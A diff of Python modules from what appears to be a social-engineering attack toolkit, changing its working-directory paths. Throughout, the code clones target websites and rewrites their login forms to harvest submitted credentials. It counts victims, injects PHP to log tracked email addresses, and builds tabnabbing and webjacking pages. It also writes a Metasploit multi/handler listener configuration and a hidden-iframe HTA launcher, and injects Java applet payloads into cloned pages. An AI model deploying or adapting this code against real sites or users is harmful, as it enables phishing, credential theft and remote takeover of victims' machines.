|
||||
|
||||
host = int(len(ipaddr) + 1) * "X"
|
||||
|
||||
|
@ -127,7 +127,7 @@ if choice == "1":
|
|||
# we get a hit?
|
||||
if match:
|
||||
subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" %
|
||||
(setdir, setdir), shell=True).wait()
|
||||
(userconfigpath, userconfigpath), shell=True).wait()
|
||||
counter = 1
|
||||
|
||||
# if we didnt find rar
|
||||
|
@ -139,11 +139,11 @@ if choice == "1":
|
|||
# if its a zipfile zip the badboy up
|
||||
if choice == "2":
|
||||
# write to a zipfile here
|
||||
file = zipfile.ZipFile(setdir + "/template.zip", "w")
|
||||
for name in glob.glob(setdir + "/dll/*"):
|
||||
file = zipfile.ZipFile(userconfigpath + "template.zip", "w")
|
||||
for name in glob.glob(userconfigpath + "dll/*"):
|
||||
file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED)
|
||||
file.close()
|
||||
|
||||
if os.path.isfile(setdir + "/msf.exe"):
|
||||
if os.path.isfile(userconfigpath + "msf.exe"):
|
||||
subprocess.Popen("cp %s/msf.exe %s/src/html/" %
|
||||
(setdir, definepath), shell=True).wait()
|
||||
(userconfigpath, definepath), shell=True).wait()
|
||||
|
|
|
@ -75,7 +75,7 @@ except Exception as err:
|
|||
|
||||
|
||||
attack_vector = ""
|
||||
fileopen = open(setdir + "/attack_vector", "r")
|
||||
fileopen = open(userconfigpath + "attack_vector", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
if line == 'multiattack':
|
||||
|
@ -111,7 +111,7 @@ for line in fileopen:
|
|||
if match2:
|
||||
command_center = "on"
|
||||
command_center_write = open(
|
||||
setdir + "/cc_harvester_hit" % (setdir), "w")
|
||||
userconfigpath + "cc_harvester_hit" % (userconfigpath), "w")
|
||||
|
||||
# if nada default port 80
|
||||
if counter == 0:
|
||||
|
@ -119,7 +119,7 @@ if counter == 0:
|
|||
|
||||
# pull URL field
|
||||
counter = 0
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("URL=", line)
|
||||
|
@ -166,10 +166,10 @@ for line in fileopen:
|
|||
sys.path.append("src/core/ssl")
|
||||
# import our ssl module
|
||||
import setssl
|
||||
subprocess.Popen("cp %s/CA/*.pem %s" % (setdir, setdir),
|
||||
subprocess.Popen("cp %s/CA/*.pem %s" % (userconfigpath, userconfigpath),
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
# remove old junk we dont need anymore
|
||||
subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (setdir, setdir),
|
||||
subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (userconfigpath, userconfigpath),
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
|
||||
# if user wants to specify his/her own PEM certificate
|
||||
|
@ -184,7 +184,7 @@ for line in fileopen:
|
|||
print("\nUnable to find PEM file, check location and config again.")
|
||||
exit_set()
|
||||
if os.path.isfile(pem_client):
|
||||
subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, setdir),
|
||||
subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, userconfigpath),
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
match2 = re.search("PEM_SERVER=", line)
|
||||
if match2:
|
||||
|
@ -193,7 +193,7 @@ for line in fileopen:
|
|||
print("\nUnable to find PEM file, check location and config again.")
|
||||
exit_set()
|
||||
if os.path.isfile(pem_server):
|
||||
subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, setdir),
|
||||
subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, userconfigpath),
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
|
||||
# url decode for postbacks
|
||||
|
@ -211,8 +211,8 @@ def urldecode(url):
|
|||
|
||||
|
||||
# here is where we specify how many people actually visited versus fell for it
|
||||
visits = open(setdir + "/visits.file", "a")
|
||||
bites = open(setdir + "/bites.file", "a")
|
||||
visits = open(userconfigpath + "visits.file", "a")
|
||||
bites = open(userconfigpath + "bites.file", "a")
|
||||
|
||||
# SET Handler for handling POST requests and general setup through SSL
|
||||
|
||||
|
@ -247,7 +247,7 @@ class SETHandler(BaseHTTPRequestHandler):
|
|||
#print('-' * 40)
|
||||
pass
|
||||
|
||||
webroot = os.path.abspath(os.path.join(setdir, 'web_clone'))
|
||||
webroot = os.path.abspath(os.path.join(userconfigpath, 'web_clone'))
|
||||
requested_file = os.path.abspath(os.path.join(webroot, self.path))
|
||||
# try block setup to catch transmission errors
|
||||
try:
|
||||
|
@ -256,7 +256,7 @@ class SETHandler(BaseHTTPRequestHandler):
|
|||
self.send_response(200)
|
||||
self.send_header('Content_type', 'text/html')
|
||||
self.end_headers()
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
for line in fileopen:
|
||||
self.wfile.write(line)
|
||||
# write out that we had a visit
|
||||
|
@ -268,7 +268,7 @@ class SETHandler(BaseHTTPRequestHandler):
|
|||
self.send_response(200)
|
||||
self.send_header('Content_type', 'text/html')
|
||||
self.end_headers()
|
||||
fileopen = open(setdir + "/web_clone/index2.html", "r")
|
||||
fileopen = open(userconfigpath + "web_clone/index2.html", "r")
|
||||
for line in fileopen:
|
||||
self.wfile.write(line)
|
||||
# write out that we had a visit
|
||||
|
@ -310,7 +310,7 @@ class SETHandler(BaseHTTPRequestHandler):
|
|||
# change path to root for append on file
|
||||
os.chdir(homepath)
|
||||
# put the params into site.template for later user
|
||||
filewrite = open(setdir + "/site.template", "a")
|
||||
filewrite = open(userconfigpath + "site.template", "a")
|
||||
filewrite.write("\n")
|
||||
if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())):
|
||||
filewrite3 = open("%s/src/logs/harvester.log" % os.getcwd(), "w")
|
||||
|
@ -356,7 +356,7 @@ class SETHandler(BaseHTTPRequestHandler):
|
|||
|
||||
# pull URL field
|
||||
counter = 0
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("URL=", line)
|
||||
|
@ -380,7 +380,7 @@ class SETHandler(BaseHTTPRequestHandler):
|
|||
'<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL))
|
||||
|
||||
# set it back to our homepage
|
||||
os.chdir(setdir + "/web_clone/")
|
||||
os.chdir(userconfigpath + "web_clone/")
|
||||
|
||||
|
||||
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
|
||||
|
@ -526,37 +526,37 @@ def run():
|
|||
(logpath, harvester_file), shell=True).wait()
|
||||
|
||||
# if we are using webjacking, etc.
|
||||
if os.path.isfile(setdir + "/web_clone/index2.html"):
|
||||
if os.path.isfile(userconfigpath + "web_clone/index2.html"):
|
||||
# need to copy the files over - remove the old one first if there
|
||||
if os.path.isfile(apache_dir + "/index2.html"):
|
||||
os.remove(apache_dir + "/index2.html")
|
||||
|
||||
shutil.copyfile(setdir + "/web_clone/index2.html",
|
||||
shutil.copyfile(userconfigpath + "web_clone/index2.html",
|
||||
apache_dir + "/index2.html")
|
||||
|
||||
# here we specify if we are tracking users and such
|
||||
if track_email == True:
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
data = fileopen.read()
|
||||
data = data.replace(
|
||||
"<body>", """<body><?php $file = '%s'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (harvester_file))
|
||||
filewrite = open(setdir + "/web_clone/index.2", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/index.2", "w")
|
||||
filewrite.write(data)
|
||||
filewrite.close()
|
||||
os.remove(setdir + "/web_clone/index.html")
|
||||
shutil.copyfile(setdir + "/web_clone/index.2",
|
||||
setdir + "/web_clone/index.html")
|
||||
os.remove(userconfigpath + "web_clone/index.html")
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.2",
|
||||
userconfigpath + "web_clone/index.html")
|
||||
# copy the entire web_clone directory.
|
||||
# Without this only index.php|html are copied even though the user
|
||||
# may have chosen to import the entire directory in the set module.
|
||||
copyfolder(setdir + "/web_clone", apache_dir)
|
||||
copyfolder(userconfigpath + "web_clone", apache_dir)
|
||||
if os.path.isfile("%s/index.html" % (apache_dir)):
|
||||
os.remove("%s/index.html" % (apache_dir))
|
||||
if track_email == False:
|
||||
shutil.copyfile(setdir + "/web_clone/index.html",
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html",
|
||||
"%s/index.html" % (apache_dir))
|
||||
if track_email == True:
|
||||
shutil.copyfile(setdir + "/web_clone/index.html",
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html",
|
||||
"%s/index.php" % (apache_dir))
|
||||
print_status(
|
||||
"NOTE: The URL to click on is index.php NOT index.html with track emails.")
|
||||
|
@ -615,7 +615,7 @@ if webattack_email == True:
|
|||
module_reload(src.phishing.smtp.client.smtp_web)
|
||||
|
||||
# see if we're tabnabbing or multiattack
|
||||
fileopen = open(setdir + "/attack_vector", "r")
|
||||
fileopen = open(userconfigpath + "attack_vector", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
if line == 'tabnabbing':
|
||||
|
@ -628,12 +628,12 @@ for line in fileopen:
|
|||
if ssl_flag == 'true':
|
||||
web_port = "443"
|
||||
# check for PEM files here
|
||||
if not os.path.isfile(setdir + "/newreq.pem"):
|
||||
if not os.path.isfile(userconfigpath + "newreq.pem"):
|
||||
print("PEM files not detected. SSL will not work properly.")
|
||||
if not os.path.isfile(setdir + "/newcert.pem"):
|
||||
if not os.path.isfile(userconfigpath + "newcert.pem"):
|
||||
print("PEM files not detected. SSL will not work properly.")
|
||||
# copy over our PEM files
|
||||
subprocess.Popen("cp %s/*.pem %s/web_clone/" % (setdir, setdir),
|
||||
subprocess.Popen("cp %s/*.pem %s/web_clone/" % (userconfigpath, userconfigpath),
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
# copy patched socket over to web clone
|
||||
definepath = os.getcwd()
|
||||
|
@ -643,7 +643,7 @@ if ssl_flag == 'true':
|
|||
|
||||
# head over to cloned dir
|
||||
if apache_check == False:
|
||||
os.chdir(setdir + "/web_clone/")
|
||||
os.chdir(userconfigpath + "web_clone/")
|
||||
|
||||
if attack_vector != "multiattack":
|
||||
if apache_check == False:
|
||||
|
|
|
@ -7,8 +7,8 @@ import datetime
|
|||
from src.core.setcore import *
|
||||
|
||||
# make sure the reports directory is created
|
||||
if not os.path.isdir(setdir + "/reports/"):
|
||||
os.makedirs(setdir + "/reports/")
|
||||
if not os.path.isdir(userconfigpath + "reports/"):
|
||||
os.makedirs(userconfigpath + "reports/")
|
||||
|
||||
#
|
||||
# Quick report generation script
|
||||
|
@ -33,20 +33,20 @@ definepath = os.getcwd()
|
|||
|
||||
# grab URL and report information
|
||||
now = datetime.datetime.today()
|
||||
fileopen = open(setdir + "/site.template", "r")
|
||||
site_template = open(setdir + "/site.template", "r").readlines()
|
||||
fileopen = open(userconfigpath + "site.template", "r")
|
||||
site_template = open(userconfigpath + "site.template", "r").readlines()
|
||||
fileopen1 = open("%s/src/core/reports/index.html" % (definepath), "r")
|
||||
for line in fileopen:
|
||||
match = re.search("URL=", line)
|
||||
if match:
|
||||
url = line.replace("URL=http://", "")
|
||||
url = line.replace("URL=https://", "")
|
||||
filewrite2 = open(setdir + "/reports/%s.xml" % (now), "a")
|
||||
filewrite2 = open(userconfigpath + "reports/%s.xml" % (now), "a")
|
||||
filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n")
|
||||
filewrite2.write(r"<harvester>" + "\n")
|
||||
for line2 in fileopen1:
|
||||
counter = 0
|
||||
filewrite = open(setdir + "/reports/%s.html" % (now), "a")
|
||||
filewrite = open(userconfigpath + "reports/%s.html" % (now), "a")
|
||||
match1 = re.search("REPLACEHEREDUDE", line2)
|
||||
if match1:
|
||||
line2 = line2.replace("REPLACEHEREDUDE", url)
|
||||
|
@ -83,8 +83,8 @@ for line in fileopen:
|
|||
# look for how many people visited the website
|
||||
match5 = re.search("VISITORSHERE", line2)
|
||||
if match5:
|
||||
if os.path.isfile(setdir + "/visits.file"):
|
||||
fileopen3 = open(setdir + "/visits.file", "r")
|
||||
if os.path.isfile(userconfigpath + "visits.file"):
|
||||
fileopen3 = open(userconfigpath + "visits.file", "r")
|
||||
counter5 = 0
|
||||
for line in fileopen3:
|
||||
if line != "":
|
||||
|
@ -92,7 +92,7 @@ for line in fileopen:
|
|||
counter5 = counter5 + 1
|
||||
if line == "":
|
||||
counter5 = 0
|
||||
if not os.path.isfile(setdir + "/visits.file"):
|
||||
if not os.path.isfile(userconfigpath + "visits.file"):
|
||||
counter5 = 0
|
||||
|
||||
line2 = line2.replace("VISITORSHERE", str(counter5), 2)
|
||||
|
@ -101,13 +101,13 @@ for line in fileopen:
|
|||
|
||||
match6 = re.search("BITESHERE", line2)
|
||||
if match6:
|
||||
if os.path.isfile(setdir + "/bites.file"):
|
||||
fileopen4 = open(setdir + "/bites.file", "r")
|
||||
if os.path.isfile(userconfigpath + "bites.file"):
|
||||
fileopen4 = open(userconfigpath + "bites.file", "r")
|
||||
counter5 = 0
|
||||
for line in fileopen4:
|
||||
line = line.rstrip()
|
||||
counter5 = counter5 + 1
|
||||
if not os.path.isfile(setdir + "/bites.file"):
|
||||
if not os.path.isfile(userconfigpath + "bites.file"):
|
||||
counter5 = 0
|
||||
|
||||
line2 = line2.replace("BITESHERE", str(counter5))
|
||||
|
@ -125,6 +125,6 @@ except:
|
|||
pass
|
||||
|
||||
subprocess.Popen("cp -rf %s/src/core/reports/files %s/reports/" % (definepath,
|
||||
setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (setdir, now) + bcolors.ENDC)
|
||||
print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (setdir, now) + bcolors.ENDC)
|
||||
userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC)
|
||||
print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC)
|
||||
|
|
|
@ -24,13 +24,13 @@ else:
|
|||
# set the multiattack tabnabbing/webjacking flag
|
||||
multi_tabnabbing = "off"
|
||||
multi_webjacking = "off"
|
||||
if os.path.isfile(setdir + "/multi_tabnabbing"):
|
||||
if os.path.isfile(userconfigpath + "multi_tabnabbing"):
|
||||
multi_tabnabbing = "on"
|
||||
if os.path.isfile(setdir + "/multi_webjacking"):
|
||||
if os.path.isfile(userconfigpath + "multi_webjacking"):
|
||||
multi_webjacking = "on"
|
||||
|
||||
# see if we're tabnabbing
|
||||
fileopen = open(setdir + "/attack_vector", "r")
|
||||
fileopen = open(userconfigpath + "attack_vector", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on":
|
||||
|
@ -59,8 +59,8 @@ if apache_mode == "on":
|
|||
apache_rewrite = "post.php"
|
||||
|
||||
# start the scraping process
|
||||
fileopen = open(setdir + "/web_clone/%s" % (site), "r").readlines()
|
||||
filewrite = open(setdir + "/web_clone/index.html.new", "w")
|
||||
fileopen = open(userconfigpath + "web_clone/%s" % (site), "r").readlines()
|
||||
filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
|
||||
for line in fileopen:
|
||||
|
||||
# specify if it found post params
|
||||
|
@ -102,9 +102,9 @@ for line in fileopen:
|
|||
# close the file
|
||||
filewrite.close()
|
||||
# move our newly created website with our post stuff to our cloned area
|
||||
if os.path.isfile(setdir + "/web_clone/index.html.new"):
|
||||
shutil.copyfile(setdir + "/web_clone/index.html.new", setdir + "/" + site)
|
||||
if os.path.isfile(setdir + "/web_clone/" + site):
|
||||
os.remove(setdir + "/web_clone/" + site)
|
||||
shutil.move(setdir + "/web_clone/index.html.new",
|
||||
setdir + "/web_clone/%s" % (site))
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html.new", userconfigpath + "" + site)
|
||||
if os.path.isfile(userconfigpath + "web_clone/" + site):
|
||||
os.remove(userconfigpath + "web_clone/" + site)
|
||||
shutil.move(userconfigpath + "web_clone/index.html.new",
|
||||
userconfigpath + "web_clone/%s" % (site))
|
||||
|
|
|
@ -56,16 +56,16 @@ def gen_hta_cool_stuff():
|
|||
html_code = ("""<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>\n<script type="text/javascript">setTimeout(function(){window.location.href="%s";}, 15000);</script>""" % url)
|
||||
|
||||
# metasploit answer file here
|
||||
filewrite = open(setdir + "/meta_config", "w")
|
||||
filewrite = open(userconfigpath + "meta_config", "w")
|
||||
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port))
|
||||
filewrite.close()
|
||||
|
||||
# write out main1 and main2
|
||||
filewrite = open(setdir + "/hta_index", "w")
|
||||
filewrite = open(userconfigpath + "hta_index", "w")
|
||||
filewrite.write(html_code)
|
||||
filewrite.close()
|
||||
|
||||
# write out launcher.hta
|
||||
filewrite = open(setdir + "/Launcher.hta", "w")
|
||||
filewrite = open(userconfigpath + "Launcher.hta", "w")
|
||||
filewrite.write(main1 + main2 + main3 + main4)
|
||||
filewrite.close()
|
||||
|
|
|
@ -51,12 +51,12 @@ def flag_off(vector):
|
|||
|
||||
|
||||
def write_file(filename, results):
|
||||
filewrite = open(setdir + "/%s" % (filename), "w")
|
||||
filewrite = open(userconfigpath + "%s" % (filename), "w")
|
||||
filewrite.write(results)
|
||||
filewrite.close()
|
||||
|
||||
# specify attackvector
|
||||
filewrite = open(setdir + "/attack_vector", "w")
|
||||
filewrite = open(userconfigpath + "attack_vector", "w")
|
||||
filewrite.write("multiattack")
|
||||
filewrite.close()
|
||||
|
||||
|
@ -79,14 +79,14 @@ webdav_enable = "OFF"
|
|||
|
||||
# see if we are running a custom cloned website
|
||||
clonedurl = 0
|
||||
fileopen = open(setdir + "/site.template", "r")
|
||||
fileopen = open(userconfigpath + "site.template", "r")
|
||||
data = fileopen.read()
|
||||
if "TEMPLATE=SELF" in data:
|
||||
clonedurl = 1
|
||||
|
||||
# clean up cloner directory
|
||||
if clonedurl == 0:
|
||||
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (setdir, setdir),
|
||||
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (userconfigpath, userconfigpath),
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
|
||||
# set a quick loop to see what the user wants
|
||||
|
@ -349,7 +349,7 @@ if meta_attack == "on":
|
|||
|
||||
# this checks to see if the MSF payload uses webdav, if so we have to
|
||||
# force port 80
|
||||
if os.path.isfile(setdir + "/webdav_enabled"):
|
||||
if os.path.isfile(userconfigpath + "webdav_enabled"):
|
||||
webdav_enabled = "on"
|
||||
|
||||
# set this incase msf attack, java applet, and harvester is needed
|
||||
|
|
|
@ -18,13 +18,13 @@ for line in fileopen:
|
|||
webjacking_timing = line
|
||||
|
||||
# grab attack_vector specification
|
||||
fileopen = open(setdir + "/attack_vector", "r")
|
||||
fileopen = open(userconfigpath + "attack_vector", "r")
|
||||
for line in fileopen:
|
||||
attack_vector = line.rstrip()
|
||||
|
||||
# need to see if we created file to trigger multi attack webjacking
|
||||
multi_webjacking = "off"
|
||||
if os.path.isfile(setdir + "/multi_webjacking"):
|
||||
if os.path.isfile(userconfigpath + "multi_webjacking"):
|
||||
multi_webjacking = "on"
|
||||
|
||||
|
||||
|
@ -34,7 +34,7 @@ if check_options("IPADDR=") != 0:
|
|||
ipaddr = check_options("IPADDR=")
|
||||
|
||||
# pull URL field so we can pull favicon later on
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
for line in fileopen:
|
||||
match = re.search("URL=", line)
|
||||
if match:
|
||||
|
@ -48,12 +48,12 @@ for line in fileopen:
|
|||
|
||||
# move cloned site to index2.html
|
||||
subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" %
|
||||
(setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
(userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
|
||||
# grab the source and write it out to the cloned directory
|
||||
fileopen = open("src/webattack/tabnabbing/source.js", "r")
|
||||
# write it to dir
|
||||
filewrite = open(setdir + "/web_clone/source.js", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/source.js", "w")
|
||||
# loop
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
|
@ -66,10 +66,10 @@ filewrite.close()
|
|||
if attack_vector == "tabnabbing":
|
||||
# grab favicon
|
||||
favicon = urllib.urlopen("%s/favicon.ico" % (URL))
|
||||
output = open(setdir + '/web_clone/favicon.ico', 'wb')
|
||||
output = open(userconfigpath + '/web_clone/favicon.ico', 'wb')
|
||||
output.write(favicon.read())
|
||||
output.close()
|
||||
filewrite1 = open(setdir + "/web_clone/index.html", "w")
|
||||
filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
|
||||
filewrite1.write(
|
||||
'<head><script type="text/javascript" src="source.js"></script></head>\n')
|
||||
filewrite1.write("<body>\n")
|
||||
|
@ -79,7 +79,7 @@ if attack_vector == "tabnabbing":
|
|||
|
||||
# define webjacking or multi webjacking here
|
||||
if attack_vector == "webjacking" or multi_webjacking == "on":
|
||||
filewrite1 = open(setdir + "/web_clone/index.html", "w")
|
||||
filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
|
||||
filewrite1.write("<script>\n")
|
||||
filewrite1.write("function a(){\n")
|
||||
filewrite1.write(
|
||||
|
|
|
@ -46,17 +46,17 @@ site_cloned = True
|
|||
meterpreter_iframe = "8080"
|
||||
|
||||
# make dir if needed
|
||||
if not os.path.isdir(setdir + "/web_clone/"):
|
||||
os.makedirs(setdir + "/web_clone")
|
||||
if not os.path.isdir(userconfigpath + "web_clone/"):
|
||||
os.makedirs(userconfigpath + "web_clone")
|
||||
|
||||
# if we used a proxy configuration from the set-proxy
|
||||
if os.path.isfile(setdir + "/proxy.confg"):
|
||||
if os.path.isfile(userconfigpath + "proxy.confg"):
|
||||
|
||||
fileopen = open(setdir + "/proxy.config", "r")
|
||||
fileopen = open(userconfigpath + "proxy.config", "r")
|
||||
proxy_config = fileopen.read().rstrip()
|
||||
|
||||
# just do a ls
|
||||
if not os.path.isfile(setdir + "/proxy.confg"):
|
||||
if not os.path.isfile(userconfigpath + "proxy.confg"):
|
||||
proxy_config = "ls"
|
||||
|
||||
# if counter == 0: web_port=80
|
||||
|
@ -64,7 +64,7 @@ if not os.path.isfile(setdir + "/proxy.confg"):
|
|||
webdav_meta = 0
|
||||
# see if exploit requires webdav
|
||||
try:
|
||||
fileopen = open(setdir + "/meta_config", "r")
|
||||
fileopen = open(userconfigpath + "meta_config", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("set SRVPORT 80", line)
|
||||
|
@ -77,7 +77,7 @@ except:
|
|||
|
||||
template = ""
|
||||
# Grab custom or set defined
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("TEMPLATE=", line)
|
||||
|
@ -87,8 +87,8 @@ for line in fileopen:
|
|||
|
||||
# grab attack_vector specification
|
||||
attack_vector = ""
|
||||
if os.path.isfile(setdir + "/attack_vector"):
|
||||
fileopen = open(setdir + "/attack_vector", "r").readlines()
|
||||
if os.path.isfile(userconfigpath + "attack_vector"):
|
||||
fileopen = open(userconfigpath + "attack_vector", "r").readlines()
|
||||
for line in fileopen:
|
||||
attack_vector = line.rstrip()
|
||||
|
||||
|
@ -108,7 +108,7 @@ update_options("APPLET_NAME=" + rand_gen_applet)
|
|||
|
||||
try:
|
||||
# open our config file that was specified in SET
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
# start loop here
|
||||
url_counter = 0
|
||||
for line in fileopen:
|
||||
|
@ -146,10 +146,10 @@ try:
|
|||
if wget == 1:
|
||||
if check_config("WGET_DEEP").lower() == "on":
|
||||
subprocess.Popen('%s;wget -H -N -k -p -l 2 -nd -P %s/web_clone/ --no-check-certificate -U "%s" "%s";' %
|
||||
(proxy_config, setdir, user_agent, url), shell=True).wait()
|
||||
(proxy_config, userconfigpath, user_agent, url), shell=True).wait()
|
||||
else:
|
||||
subprocess.Popen('%s;cd %s/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" "%s";' %
|
||||
(proxy_config, setdir, user_agent, url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
(proxy_config, userconfigpath, user_agent, url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
|
||||
else:
|
||||
# if we don't have wget installed we will use python to rip,
|
||||
|
@ -169,7 +169,7 @@ try:
|
|||
# if the site has cloned properly
|
||||
site_cloned = True
|
||||
# open file for writing
|
||||
filewrite = open(setdir + "/web_clone/index.html", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html", "w")
|
||||
# write the data back from the request
|
||||
filewrite.write(html)
|
||||
# close the file
|
||||
|
@ -181,18 +181,18 @@ try:
|
|||
pass
|
||||
|
||||
# If the website did not clone properly, exit out.
|
||||
if not os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
if not os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
print((
|
||||
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
|
||||
return_continue()
|
||||
site_cloned = False
|
||||
# add file to let set interactive shell know it was unsuccessful
|
||||
filewrite = open(setdir + "/cloner.failed", "w")
|
||||
filewrite = open(userconfigpath + "cloner.failed", "w")
|
||||
filewrite.write("failed")
|
||||
filewrite.close()
|
||||
|
||||
if os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
counter = 0
|
||||
for line in fileopen:
|
||||
counter = counter + 1
|
||||
|
@ -201,27 +201,27 @@ try:
|
|||
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
|
||||
return_continue()
|
||||
site_cloned = False
|
||||
os.remove(setdir + "/web_clone/index.html")
|
||||
os.remove(userconfigpath + "web_clone/index.html")
|
||||
|
||||
# add file to let set interactive shell know it was
|
||||
# unsuccessful
|
||||
filewrite = open(setdir + "/cloner.failed", "w")
|
||||
filewrite = open(userconfigpath + "cloner.failed", "w")
|
||||
filewrite.write("failed")
|
||||
filewrite.close()
|
||||
|
||||
if site_cloned == True:
|
||||
|
||||
# make a backup of the site if needed
|
||||
shutil.copyfile(setdir + "/web_clone/index.html",
|
||||
setdir + "/web_clone/index.html.bak")
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html",
|
||||
userconfigpath + "web_clone/index.html.bak")
|
||||
|
||||
if site_cloned == True:
|
||||
|
||||
# if we specify UNC embedding
|
||||
if unc_embed == True:
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
index_database = fileopen.read()
|
||||
filewrite = open(setdir + "/web_clone/index.html", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html", "w")
|
||||
|
||||
# Open the UNC EMBED
|
||||
fileopen4 = open("src/webattack/web_clone/unc.database", "r")
|
||||
|
@ -243,7 +243,7 @@ try:
|
|||
|
||||
# check for java flag for multi attack
|
||||
multi_java = False
|
||||
if os.path.isfile(setdir + "/multi_java"):
|
||||
if os.path.isfile(userconfigpath + "multi_java"):
|
||||
multi_java = True
|
||||
|
||||
if attack_vector == "java" or multi_java:
|
||||
|
@ -254,17 +254,17 @@ try:
|
|||
bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC))
|
||||
# Read in newly created index.html
|
||||
time.sleep(2)
|
||||
if not os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
if not os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
# trigger error that we were unable to grab the website :(
|
||||
print_error(
|
||||
"Unable to clone the website it appears. Email us to fix.")
|
||||
sys.exit()
|
||||
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
